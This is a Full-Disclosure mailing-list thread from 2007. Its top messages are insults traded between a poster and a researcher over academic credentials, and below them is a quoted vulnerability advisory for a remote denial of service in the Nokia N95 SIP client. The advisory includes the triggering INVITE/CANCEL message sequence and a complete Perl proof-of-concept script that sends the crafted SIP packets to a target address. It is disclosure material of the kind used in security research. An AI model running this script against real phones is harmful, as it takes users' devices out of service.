<a href="http://hal.inria.fr/index.php?view_this_doc=inria-00172056&amp;extended_view=1&amp;version=&amp;halsid=5561bd637e62791f1744a158d907343a">http://hal.inria.fr/index.php?view_this_doc=inria-00172056&amp;extended_view=1&amp;version=&amp;halsid=5561bd637e62791f1744a158d907343a
</a><br><br>Could you please send me this document so i can learn from you how to nmap? I would very much appreciate reading this paper so I can learn the basics of a high level pen test.<br><br><a href="http://hal.inria.fr/inria-00168415/fr/">
http://hal.inria.fr/inria-00168415/fr/</a><br><br>I would also love this paper. Based on the times you mention the word &quot;model&quot; and &quot;proven&quot; it seems your product must be better&nbsp; then selinux itself.<br>
<br>The rest of your papers were modeled around mobile ad-hoc networks and &quot;key managment in blah blah&quot; which are areas generally reserved for academics who cannot publish anything useful so it seems appropriate that the bulk of your publications are in this field.
<br><br><br><br><br><div class="gmail_quote">On Dec 5, 2007 1:57 PM,  &lt;<a href="mailto:state@loria.fr">state@loria.fr</a>&gt; wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
hi Reepex,<br><br>I do not understand why are frustrated about a computer science degree. Maybe,<br>someone got dropped out of a degree programm and some psychological trauma gets<br>&nbsp;activated when seeing a Ph.D?<br><br>
If you like it or not, in order to get a computer science degree, you will have<br>to take classes, and &nbsp;most classes are taught by Ph.Ds.<br><br>I will not argue with you on why I use the Ph.D in my signature, but if you
<br>really want to know, look at our research papers published in academic<br>journals/conferences. (If you do not find them, I can send them to you).<br>If you will ever understand the contents, then you will understand what are our
<br>credentials..:) This will probably never happen.<br><br>At least, I use a signature and a real name and do not hide behind a gmail<br>account.<br><br>Meanwhile try yourself to find at least one vulnerability and enjoy Perl
<br>programming, it seemes your computer science skills are somehow in this area :)<br><br><br>Greetings<br><br><br><br><br>RS<br><br><br>Selon reepex &lt;<a href="mailto:reepex@gmail.com">reepex@gmail.com</a>&gt;:<br><div>
<div></div><div class="Wj3C7c"><br>&gt; So almighty Phd what is your thesis exactly?<br>&gt;<br>&gt; To me it seems to be &nbsp;&#39;how to run a fuzzer then write crappy perl &nbsp;scripts<br>&gt; to exploit DoS conditions&#39;<br>
&gt;<br>&gt; does this properly summarize your phd credentials?<br>&gt;<br>&gt; I guess &nbsp;you could tack on &#39;after writing the crappy scripts, flood mailing<br>&gt; lists with our crap, and get made fun of&#39;<br>&gt;
<br>&gt; I am sure you will serve the academic community great one day when teach<br>&gt; &quot;hacking&quot; classes revolving around the latest editions of hacking exposed<br>&gt;<br>&gt;<br>&gt;<br>&gt; On Dec 5, 2007 11:05 AM, Radu State &lt;
<a href="mailto:State@loria.fr">State@loria.fr</a>&gt; wrote:<br>&gt;<br>&gt; &gt; &nbsp;Nokia N95 cellphone remote DoS using the SIP Stack<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Severity:<br>&gt; &gt;<br>&gt; &gt; High – Denial of Service
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Hardware:<br>&gt; &gt;<br>&gt; &gt; Nokia N95<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Firmware:<br>&gt; &gt;<br>&gt; &gt; Tested version: Nokia RM-159 V 12.0.013
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Notification:<br>&gt; &gt;<br>&gt; &gt; Vulnerability found: 11 September 2007<br>&gt; &gt;<br>&gt; &gt; Contact Nokia Support: 12 September 2007 / None reply Contact Nokia
<br>&gt; &gt; Security Support: 19 September 2007 / None reply<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Vulnerability Synopsis:<br>&gt; &gt;<br>&gt; &gt; If the device has the SIP Phone client activated, a sequence of SIP
<br>&gt; &gt; messages turn the device in an inconsistent state where the user is not<br>&gt; able<br>&gt; &gt; to operate it anymore until it reboots.<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; The sequence of messages consists in 2 different SIP Dialogs where the
<br>&gt; &gt; first initiates an INVITE transaction but immediately closes it (in an<br>&gt; &gt; anticipated manner). While, the second transaction initiates a normal<br>&gt; INVITE<br>&gt; &gt; transaction that trigger the vulnerability of the target.
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; The sequence of messages is illustrated below.<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; X ------------------------- INVITE -----------------------&gt; Nokiav12
<br>&gt; &gt;<br>&gt; &gt; X &lt;---------------------- 100 Trying ---------------------- Nokiav12<br>&gt; &gt;<br>&gt; &gt; X ------------------------- CANCEL -----------------------&gt; Nokiav12<br>&gt; &gt;<br>&gt; &gt; X &lt;----------------- OK (to the Cancel) ------------------- Nokiav12
<br>&gt; &gt;<br>&gt; &gt; &nbsp;X &lt;---------------- 487 Request Terminated ---------------- Nokiav12<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; --------New Dialog--------<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>
&gt; &gt; X ------------------------- INVITE -----------------------&gt; Nokiav12<br>&gt; &gt;<br>&gt; &gt; X &lt;---------------------- 100 Trying ---------------------- Nokiav12<br>&gt; &gt;<br>&gt; &gt; X &lt;---------------------- 180 Trying ---------------------- Nokiav12
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; ---- The device does not work properly anymore ----<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Impact:<br>&gt; &gt;<br>&gt; &gt; A remote entity can take down all the services of the cell phone
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Resolution:<br>&gt; &gt;<br>&gt; &gt; As we did not get any proper reply from Nokia about the subject, the best<br>&gt; &gt; way will be to disable the SIP Client<br>&gt; &gt;
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Credits:<br>&gt; &gt;<br>&gt; &gt; Humberto J. Abdelnur (Ph.D Student)<br>&gt; &gt;<br>&gt; &gt; Radu State (Ph.D)<br>&gt; &gt;<br>&gt; &gt; Olivier Festor (Ph.D)<br>&gt; &gt;<br>&gt; &gt;
<br>&gt; &gt;<br>&gt; &gt; This vulnerability was identified by the Madynes research team at INRIA<br>&gt; &gt; Lorraine, using KiF the Madynes VoIP fuzzer.<br>&gt; &gt;<br>&gt; &gt; <a href="http://madynes.loria.fr/" target="_blank">
http://madynes.loria.fr/</a><br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Proof of Concept:<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; A perl script (nokiav12.pl) is attached to this mail. Before launching
<br>&gt; &gt;<br>&gt; &gt; it, the SIP phone has to be initialed in the target device<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Command:<br>&gt; &gt;<br>&gt; &gt; perl nokiav12.pl &lt;dst_IP&gt; &lt;username&gt; &lt;SourceIp&gt; &lt;SourceUsername&gt;
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; Eg. perl nokiav12.pl <a href="http://192.168.1.119" target="_blank">192.168.1.119</a> lupilu <a href="http://192.168.1.2" target="_blank">192.168.1.2</a> tucu<br>&gt; &gt;
<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; #!/usr/bin/perl<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; ##################################################<br>&gt; &gt;<br>&gt; &gt; # Vulnerabily discovered using KiF ~ Kiph #
<br>&gt; &gt;<br>&gt; &gt; # #<br>&gt; &gt;<br>&gt; &gt; # Authors: #<br>&gt; &gt;<br>&gt; &gt; # Humberto J. Abdelnur (Ph.D Student) #<br>&gt; &gt;<br>&gt; &gt; # Radu State (Ph.D) #<br>&gt; &gt;<br>&gt; &gt; # Olivier Festor (
Ph.D) #<br>&gt; &gt;<br>&gt; &gt; # #<br>&gt; &gt;<br>&gt; &gt; # Madynes Team, LORIA - INRIA Lorraine #<br>&gt; &gt;<br>&gt; &gt; # <a href="http://madynes.loria.fr" target="_blank">http://madynes.loria.fr</a> #<br>&gt; &gt;
<br>&gt; &gt; ##################################################<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; use IO::Socket::INET;<br>&gt; &gt;<br>&gt; &gt; use String::Random;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;
<br>&gt; &gt; die &quot;Usage $0 &lt;targetIP&gt; &lt;targetUser&gt; &lt;attackerIP&gt; &lt;attackerUser&gt;&quot;<br>&gt; &gt;<br>&gt; &gt; unless ($ARGV[3]);<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $targetUser = $ARGV[1];
<br>&gt; &gt;<br>&gt; &gt; $targetIP = $ARGV[0];<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $attackerUser = $ARGV[3];<br>&gt; &gt;<br>&gt; &gt; $attackerIP= $ARGV[2];<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $socket=new IO::Socket::INET-&gt;new(
<br>&gt; &gt;<br>&gt; &gt; Proto=&gt;&#39;udp&#39;,<br>&gt; &gt;<br>&gt; &gt; PeerPort=&gt;5060,<br>&gt; &gt;<br>&gt; &gt; PeerAddr=&gt;$targetIP,<br>&gt; &gt;<br>&gt; &gt; LocalPort=&gt;5060);<br>&gt; &gt;<br>&gt; &gt;<br>
&gt; &gt;<br>&gt; &gt; $foo = new String::Random;<br>&gt; &gt;<br>&gt; &gt; $callid= $foo-&gt;randpattern(&quot;CCccnCn&quot;);<br>&gt; &gt;<br>&gt; &gt; $cseq = $foo-&gt;randregex(&#39;\d\d\d\d&#39;);<br>&gt; &gt;<br>&gt; &gt;
<br>&gt; &gt;<br>&gt; &gt; $sdp = &quot;v=0\r<br>&gt; &gt;<br>&gt; &gt; o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r<br>&gt; &gt;<br>&gt; &gt; s=-\r<br>&gt; &gt;<br>&gt; &gt; c=IN IP4 $attackerIP\r<br>
&gt; &gt;<br>&gt; &gt; t=0 0\r<br>&gt; &gt;<br>&gt; &gt; m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r<br>&gt; &gt;<br>&gt; &gt; a=sendrecv\r<br>&gt; &gt;<br>&gt; &gt; a=ptime:20\r<br>&gt; &gt;<br>&gt; &gt; a=maxptime:200\r<br>
&gt; &gt;<br>&gt; &gt; a=fmtp:96 mode-change-neighbor=1\r<br>&gt; &gt;<br>&gt; &gt; a=fmtp:18 annexb=no\r<br>&gt; &gt;<br>&gt; &gt; a=fmtp:98 0-15\r<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:96 AMR/8000/1\r<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:0 PCMU/8000/1\r
<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:8 PCMA/8000/1\r<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:97 iLBC/8000/1\r<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:18 G729/8000/1\r<br>&gt; &gt;<br>&gt; &gt; a=rtpmap:98 telephone-event/8000/1\r<br>
&gt; &gt;<br>&gt; &gt; a=rtpmap:13 CN/8000/1\r<br>&gt; &gt;<br>&gt; &gt; &quot;;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $sdplen= length $sdp;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $msg = &quot;INVITE sip:$targetUser\@$targetIP SIP/2.0\r
<br>&gt; &gt;<br>&gt; &gt; Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r<br>&gt; &gt;<br>&gt; &gt; From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=1\r<br>&gt; &gt;<br>&gt; &gt; To: &lt;sip:$targetUser\@$targetIP&gt;\r<br>
&gt; &gt;<br>&gt; &gt; Call-ID: $callid\@$attackerIP\r<br>&gt; &gt;<br>&gt; &gt; CSeq: $cseq INVITE\r<br>&gt; &gt;<br>&gt; &gt; Max-Forwards: 70\r<br>&gt; &gt;<br>&gt; &gt; Contact: &lt;sip:$attackerUser\@$attackerIP&gt;\r
<br>&gt; &gt;<br>&gt; &gt; Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,<br>&gt; &gt;<br>&gt; &gt; MESSAGE\r<br>&gt; &gt;<br>&gt; &gt; Content-Type: application/sdp\r<br>&gt; &gt;<br>&gt; &gt; Content-Length: $sdplen\r
<br>&gt; &gt;<br>&gt; &gt; \r<br>&gt; &gt;<br>&gt; &gt; $sdp&quot;;<br>&gt; &gt;<br>&gt; &gt; $socket-&gt;send($msg);<br>&gt; &gt;<br>&gt; &gt; $text = &#39;&#39;;<br>&gt; &gt;<br>&gt; &gt; while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
<br>&gt; &gt;<br>&gt; &gt; $socket-&gt;recv($text,1024,0);<br>&gt; &gt;<br>&gt; &gt; }<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; $msg = &quot;CANCEL sip:$targetUser\@$targetIP SIP/2.0\r<br>&gt; &gt;<br>&gt; &gt; Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
<br>&gt; &gt;<br>&gt; &gt; From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=1\r<br>&gt; &gt;<br>&gt; &gt; To: &lt;sip:$targetUser\@$targetIP&gt;;tag=1\r<br>&gt; &gt;<br>&gt; &gt; Call-ID: $callid\@$attackerIP\r<br>&gt; &gt;
<br>&gt; &gt; CSeq: $cseq CANCEL\r<br>&gt; &gt;<br>&gt; &gt; Max-Forwards: 70\r<br>&gt; &gt;<br>&gt; &gt; Content-Length: 0\r<br>&gt; &gt;<br>&gt; &gt; \r<br>&gt; &gt;<br>&gt; &gt; &quot;;<br>&gt; &gt;<br>&gt; &gt; $socket-&gt;send($msg);
<br>&gt; &gt;<br>&gt; &gt; time.sleep(1);<br>&gt; &gt;<br>&gt; &gt; $callid= $foo-&gt;randpattern(&quot;CCccnCn&quot;);<br>&gt; &gt;<br>&gt; &gt; $cseq = $foo-&gt;randregex(&#39;\d\d\d\d&#39;);<br>&gt; &gt;<br>&gt; &gt; $msg = &quot;INVITE sip:$targetUser\@$targetIP SIP/2.0\r
<br>&gt; &gt;<br>&gt; &gt; Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r<br>&gt; &gt;<br>&gt; &gt; From: &lt;sip:$attackerUser\@$attackerIP&gt;;tag=2\r<br>&gt; &gt;<br>&gt; &gt; To: &lt;sip:$targetUser\@$targetIP&gt;\r<br>
&gt; &gt;<br>&gt; &gt; Call-ID: $callid\@$attackerIP\r<br>&gt; &gt;<br>&gt; &gt; CSeq: $cseq INVITE\r<br>&gt; &gt;<br>&gt; &gt; Contact: &lt;sip:$attackerUser\@$attackerIP&gt;\r<br>&gt; &gt;<br>&gt; &gt; Max-Forwards: 70\r
<br>&gt; &gt;<br>&gt; &gt; Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,<br>&gt; &gt;<br>&gt; &gt; MESSAGE\r<br>&gt; &gt;<br>&gt; &gt; Content-Type: application/sdp\r<br>&gt; &gt;<br>&gt; &gt; Content-Length: $sdplen\r
<br>&gt; &gt;<br>&gt; &gt; \r<br>&gt; &gt;<br>&gt; &gt; $sdp&quot;;<br>&gt; &gt;<br>&gt; &gt; $socket-&gt;send($msg);<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt;<br>&gt; &gt; No virus found in this outgoing message.
<br>&gt; &gt; Checked by AVG Free Edition.<br>&gt; &gt; Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:<br>&gt; &gt; 04/12/2007 19:31<br>&gt; &gt;<br>&gt; &gt; _______________________________________________
<br>&gt; &gt; Full-Disclosure - We believe in it.<br>&gt; &gt; Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>&gt; &gt; Hosted and sponsored by Secunia - 
<a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>&gt; &gt;<br>&gt;<br><br><br></div></div></blockquote></div><br>